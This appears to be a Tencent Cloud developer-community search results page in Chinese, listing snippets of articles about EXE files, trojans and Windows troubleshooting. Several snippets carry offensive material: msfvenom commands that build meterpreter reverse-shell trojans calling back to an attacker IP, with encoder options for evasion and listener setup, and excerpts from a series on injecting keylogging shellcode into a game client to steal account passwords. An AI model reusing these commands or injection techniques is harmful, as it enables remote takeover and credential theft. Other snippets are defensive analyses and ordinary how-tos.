- 综合排序
- 最热优先
- 最新优先
- 来自专栏2024年网络安全宣传周
网络安全宣传周 - EXE 文件携带木马
然而,一些不法分子利用用户对娱乐的需求,将木马程序隐藏在看似正常的小游戏 EXE 文件中,给用户的电脑安全带来了严重威胁。 二、EXE 文件携带木马的隐藏方式(一)代码混淆通过对木马代码进行混淆处理,使其难以被常规的安全检测工具识别和分析。(二)加壳技术使用加壳工具对木马程序进行封装,改变其特征码,逃避杀毒软件的查杀。 三、木马植入机制(一)自动运行在 EXE 文件被执行时,木马程序自动启动并尝试获取系统的管理员权限。(二)修改系统设置更改注册表、系统服务等设置,确保木马在系统启动时能够自动加载。 (二)物联网风险随着物联网设备的普及,EXE 文件携带的木马可能会扩展到智能设备领域,带来新的安全挑战。 (三)社交工程利用攻击者可能会更加巧妙地利用社交工程手段,诱使用户下载和运行携带木马的 EXE 文件。十、结论EXE 文件携带木马是一种严重的网络安全威胁,给个人和社会带来了巨大的风险和损失。
61210编辑于 2024-08-17 aipy实战:建设PE文件查杀神器,阻止Windows EXE木马!
查熵值异常(判断是否加密 / 加壳)(3)揪可疑 API 组合(像注册表篡改、网络通信链)(4)解析 PE 头(看编译环境、系统兼容性、加壳痕迹)二、过程实战测了个可疑文件,刚用工具跑了 nimplant.exe ,结果吓一跳:提示词:帮我写一个小型的木马静态特征查杀工具,用于检测windows下的exe可执行文件是否是可疑的木马。 最后,测试我的exe程序:"D:\Tools\aipy20250411\aipy\nimplant.exe"。检测这个文件是不是恶意的木马。把写好的软件保存在项目文件夹下。 对于程序动态连接函数,Aipy 也能仔细排查出结果啦:扫出 426 个可疑字符串,含键盘记录、勒索关键词熵值超高(.rdata 节区 6.94),明显加密痕迹检测到注册表篡改 + 网络通信 API 组合,妥妥的木马行为结论 三、优势轻量:Python 脚本直接跑,不挑环境✨灵活:特征库可自定义,适合二次开发实用:样本初筛、应急响应都能用这次打造的PE文件查杀工具初战告捷,成功识别出恶意木马的多种特征,堪称静态分析的“小钢炮
30310编辑于 2025-05-23- 来自专栏王磊的博客
Windows 7 设置devenv.exe启动版本
"C:\Program Files\Microsoft Visual Studio 8.0\Common7\IDE\devenv.exe" /dde <设置启动vs2005> "C:\Program Visual Studio 10.0\Common7\IDE\devenv.exe" /dde <设置启动vs2010> 如果是别的系统或者是没有找到注册表这么办,简单,以下是适用所有操作系统的具体方法 \Microsoft Visual Studio 8.0\Common7\IDE\devenv.exe" /dde <设置启动vs2005> "C:\Program Files\Microsoft Visual Studio 9.0\Common7\IDE\devenv.exe" /dde <设置启动vs2008> "C:\Program Files\Microsoft Visual Studio 10.0\Common7\IDE\devenv.exe" /dde <设置启动vs2010>
1.3K60发布于 2018-04-26 kali使用msf生成exe木马常用最简一条龙命令
multi/handlersetpayloadwindows/meterpreter/reverse_tcpsetLHOST192.168.186.46setLPORT4444exploit✅第一步:生成木马程序 展开代码语言:BashAI代码解释msfvenom-pwindows/meterpreter/reverse_tcpLHOST=192.168.186.46LPORT=4444-fexe-oiarc.exe 载荷LHOST=192.168.186.46攻击者的IP(即你Kali或监听机器的IP)LPORT=4444攻击者监听的端口(反向连接目标会连回这个端口)-fexe输出格式为Windows可执行文件(.exe )-oiarc.exe输出文件名为iarc.exe总结:这条命令会生成一个Windows木马程序iarc.exe,一旦在目标Windows机器上运行,它会主动连接回192.168.186.46:4444 ✅第五步:设置监听IP和端口展开代码语言:BashAI代码解释setLHOST192.168.186.46setLPORT4444这两行必须和生成木马时用的LHOST和LPORT完全一致,否则无法建立连接
1.5K20编辑于 2025-11-14- 来自专栏IT大咖说
咋多了一个svchost.exe进程?小心!你可能中了Bazar后门木马
据美国科技媒体BleepingComputer报道,一场新的网络钓鱼活动正在试图借助一种名为“BazarBackdoor”的新型后门木马来获取目标企业网络的完全访问权限。 例如,“新型冠状病毒”主题诱饵文档对应的文件名为“PreviewReport.DOC.exe”,“客户投诉”主题诱饵文档对应的文件名为“Preview.PDF.exe”。 图6.C2通信 但是,第二个C2请求将下载XOR加密的有效载荷,即BazarBackdoor后门木马。 ? 图7.XOR加密的有效载荷 最终,有效载荷将以无文件的形式注入“C:\Windows\system32\svchost.exe”进程。 图8.将后门注入svchost.exe 由于Windows任务管理中时刻都运行着大量的svchost.exe进程,因此大多数用户都不太可能会注意到什么时候多出了一个这样的进程,进而也就不会注意到后门的存在
3K20发布于 2020-05-19 centos7中安装fastDFS出错‘g_exe_name’
由于两个文件都是C语言编写,需要先编译在安装。这就需要系统中需要提前安装很多运行环境,代码如下:
23700编辑于 2024-07-26- 来自专栏全栈程序员必看
trojangeneric木马_kali木马绑定app
Kworker 木马,如果发现root 权限计划任务有以下这种非常规任务,说明已经中招成了矿机 Dt 环境,大家要注意,切莫随便给开放端口。
2K40编辑于 2022-11-08 - 来自专栏用户10781703的专栏
浅谈木马
环境: 攻击者:kali 目标主机:Windows 一、了解木马 1.木马,又称为特洛伊木马 特洛伊木马(Trojan Horse),这个名字源于公元前十二世纪希腊与特洛伊之间的一场战争。 Windows木马 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.520.520 lport=4444 -f exe -o muma.exe 三、木马的危害 由于本文探讨木马远控,这里就暂时省略文件上传、命令执行下载木马等方式将木马传入目标主机的讨论。 -p windows/meterpreter/reverse_tcp -e x86/shikata_ganai -i 30 -b ’\x00’ lhost=hackIP lport=4444 -f exe -o muma.exe -e 编码的方式 -i 编码次数 -b不使用十六进制00 一些其他的编码方式,可以使用msfvenom -l encoders命令查看 四、木马防护 1.木马的传播途径 (1
1.6K20编辑于 2023-10-10 - 来自专栏Eric杂货铺
pyinstaller.exe带logo打包exe
可以在Windows、Mac OS X和Linux上使用,但是并不是跨平台的,而是说你要是希望打包成.exe文件,需要在Windows系统上运行PyInstaller进行打包工作;打包成mac app,
1.9K30发布于 2020-09-24 - 来自专栏reizhi
win7 exe文件全打不开解决方案
有时候由于病毒破坏或者系统出错的原因,exe文件会全部无法打开,双击时显示选择打开方式窗口。此时可以使用以下方法解决。 Editor Version 5.00 [-HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.exe \Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.exe\OpenWithList] [HKEY_CURRENT_USER 如果显示导入失败,请在C:\windows\system32下面找到regedit.exe,点右键选择属性,切换到安全。将所有者更改为administrator。 然后确定退出,将regedit.exe改名为regedit.bat,再尝试双击前面做好的fix.reg,即可成功导入。如没有安全选项的,在文件夹选项中去掉“实用简单文件夹共享”即可。
1.4K20编辑于 2022-09-26 - 来自专栏FreeBuf
Kronos银行木马被发现,疑似新版Osiris木马
根据Proofpoint安全研究人员的说法,新版本的Kronos银行木马正蠢蠢欲动,研究人员证实,最近三次宣传这个旧木马的翻新版本在2014年经历了鼎盛时期。 Kronos 2018版可能是新版Osiris木马 研究人员说,与此同时,这种新的Kronos变种开始出现在他们的雷达上,一名恶意软件作者开始在黑客论坛上宣传一种新的银行木马,他称之为Osiris。 最大的线索是这个新特洛伊木马的作者声称他的木马只有350 KB大小,接近于早期Kronos 2018版样本——研究人员4月份发现的(351 KB)大小。 该样本被命名为os.exe,大概来自Osiris,巧合与否,目前没有得到证实。 ? *参考来源:bleepingcomputer,由抗生素1209编译,转载请注明来自FreeBuf.COM
1.6K50发布于 2018-07-31 - 来自专栏白安全组
挖矿木马详解
一分钟了解什么是挖矿木马 什么是挖矿木马? 定位挖矿 普通开源挖矿程序 如果感觉主机突然出现明显的卡顿,可以打开任务管理器,查看CPU使用率,中了挖矿木马时,用任务管理器可能会看到存在奇怪的进程,CPU占用率较高,比如下图中,LogonUI.exe ,ProtectionX挖矿木马就是其中一种,除了自保护和自启动外,还会释放安装驱动文件,木马运行流程如图: 母体运行后会将自身设置为隐藏属性,并释放win1logon.exe、wuauc1t.exe 、ProcessExtended.dll,并且释放一个快捷方式用于带参数启动wuauc1t.exe: 同时会在temp目录下释放随机字符命名的驱动文件,并通过注册成服务hy5.5,对应的注册表键值如下 : HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\hy5.5 并为母体1sass.exe添加注册表自启动: HKEY_LOCAL_MACHINE
13.5K61发布于 2019-12-02 - 来自专栏黑客技术家园
木马盗号《一》
这一节主要给大家分享的是黑客是如何利用木马进行盗号的。 久前看了一些安全方面的书籍。在看完了《计算机病毒揭秘与对抗》---王倍昌书 以后,打算找个目标试试手。 由于本次只是木马主要功能原理介绍,所以我并不介绍木马怎么隐藏、怎么绕过360防御(本文木马很容易被杀毒软件查杀)进行免杀。(-。-/主要我还没看。O(∩_∩)O)。 其次隐蔽性较好,他是直接在目标关键EXE注入代码,可以理解为病毒代码就是EXE的一部分。不需要另外加载DLL或者开启服务,那样目标比较大。 现在已经选好了方式:把病毒代码写入到目标EXE,然后每次运行目标EXE就会运行我们的恶意代码。下面介绍我们应该通过怎么样方式去捕获WeGame的账号和密码。 难道要让本菜IDA逆向分析整个关键EXE文件找漏洞,显然不太适合我-。-,一方面技术不行,另一方面没那么多时间。。。。那么怎么破解这个密码框捕获到的密码不对的问题呢?
1.9K30发布于 2021-04-02 - 来自专栏浩Coding
win7的svchost.exe占用内存过高如何解决
这个win7的svchost.exe很占内存的,如图: 解决方法: 1 调出任务管理器,找到服务这一栏,点击右下角服务: 2 找到windows update项,右键 - 属性 - 设为禁用:
3.8K20发布于 2019-07-03 - 来自专栏黑客技术家园
木马盗号《二》
看完了第一篇 WeGame盗号木马之旅(一) ,相信读者已经大概明白了我们需要干什么。 二、编写具体注入到目标EXE,实现按键截取的代码。 三、编写服务端接受消息的程序。 四、编写具体的病毒EXE,实现感染目标EXE并注入我们编写的木马代码。 我使用虚拟机进行调试,我使用的驱动运行环境是WIN7 32位。因为WIN7 64 和WIN 10 都有驱动签名保护,调试起来不是很方便。 所以WeGame的运行环境我放到了WIN 7虚拟机里面,服务器端我放到了本机。
2K30发布于 2021-04-02 - 来自专栏黑客技术家园
木马盗号《三》
背景: 上一篇 WeGame盗号木马之旅(二) 我们实现了键盘按键模拟驱动的开发,这篇我们实现下具体注入代码的编写。 目标: 具体的注入代码编写。实现账号获取和密码获取。 相加就是0X00570000,我的数据是加到原来EXE尾部的。下面的TASLogin.exe 也是同理。 TASLogin.exe PE结构图: ? 0x00,0x03,0x4B,0x20,0x89,0x0D,0x78,0x13,0x4F,0x00,0x8B, 0x0D,0x68,0x13,0x4F,0x00,0x03,0x4B,0x1C,0x89,0x0D,0x7C ,0x0D,0x0F,0x85,0xEC,0xFF,0xFF,0xFF,0x8B,0x0D,0x74,0x13,0x4F, 0x00,0x0F,0xB7,0x0C,0x51,0x8B,0x3D,0x7C 0xE0,0x75,0x23,0x41,0x83,0xF9,0x0E,0x0F,0x85, 0xE6,0xFF,0xFF,0xFF,0x8B,0x35,0x74,0x13,0x4F,0x00,0x0F,0xB7,0x34,0x56,0x8B,0x3D, 0x7C
2K20发布于 2021-04-02 - 来自专栏全栈程序员必看
instsrv.exe srvany.exe启动服务
ConsulClient\Parameters"; ///
/// 通过注册表注册Consul Agent服务 /// /// <param name="consulPath">exe 所在文件夹</param> /// <param name="consulExeLocal">consul.exe,exe物理路径</param> private static void ConsulClientRegEdit = null) root.DeleteSubKeyTree(subkey); } } 2.instsrv.exe srvany.exe启动服务 string consulExeLocal = DefautToolsRelyHelper.Consul + "\\consul.exe"; string srvanyPath = DefautToolsRelyHelper.Srvany + @"\srvany\srvany.exe"; string instsrvPath = DefautToolsRelyHelper.Srvany + @"\srvany\instsrv.exe"; CheckRelyTools(consulExeLocal, srvanyPath,1.1K20编辑于 2022-09-01 - 来自专栏黑客技术家园
木马盗号《四》
目标: 实现服务端的代码编写,用于接受木马发回的消息。 实现: 由于这一篇实现任务比较简单,我就讲一下密码的消息接收,账号类似。
1K40发布于 2021-04-02 - 来自专栏FreeBuf
来自云端的木马:“百家”木马集团分析
文件名:客户通知单xxx.exe(xxx代表id号) MD5:ab8c32c0360d063375794e76ae824a30 大小:340992字节 0×02样本行为分析 1、加载器行为 1)木马运行后首先从文件名中从左到右查找数字 7)解密算法如下,解密密钥保存在配置信息的jm字段中。 ? 8)解密后得到PE文件,并根据配置的傀儡进程信息,创建傀儡进程执行PE。 ? ? 2)释放winlogopc.exe、DULIB.DLL两个文件到System32目录组成白加黑,并执行winlogopc.exe,winlogopc.exe为联想相关文件,为白文件。 ? 4)DULIB.DLL运行后再次创建一个wextract.exe傀儡进程,并解密出一个PE注入到傀儡进程中执行。 ? 6)傀儡进程wextract.exe中执行的代码为远程控制木马Gh0st变种,C&C服务器地址如下: 域名/ip:a.vo88.top 端口:1818 ?
1.7K70发布于 2018-02-08 - 来自专栏架构师进阶
Win7系统把exe文件注册成为系统服务的方法
在博客IntelliJ IDEA 16 本地LicenseServer激活(破解)中有提到直接把license EXE程序注册为服务,感觉还是把EXE注册为服务舒服,这里记录一下实际的操作过程! 1.下载工具 一个叫做instsrv.exe,第二个叫做srvany.exe;百度网盘上也有的。 ? 2.安装服务 执行命令:instsrv.exe IntelliJIDEALicenseServer d:\srvany\srvany.exe //IntelliJIDEALicenseServer IntelliJIDEALicenseServer 参考:Win7系统把exe文件注册成为系统服务的方法
2K10发布于 2019-08-08
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号